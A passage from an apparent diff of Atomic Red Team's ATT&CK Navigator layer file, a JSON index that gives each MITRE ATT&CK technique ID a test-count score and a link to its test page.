Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":42,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":38,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":30,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":117,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":52,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":49,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.004/T1021.004.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"links":[{"label":"View 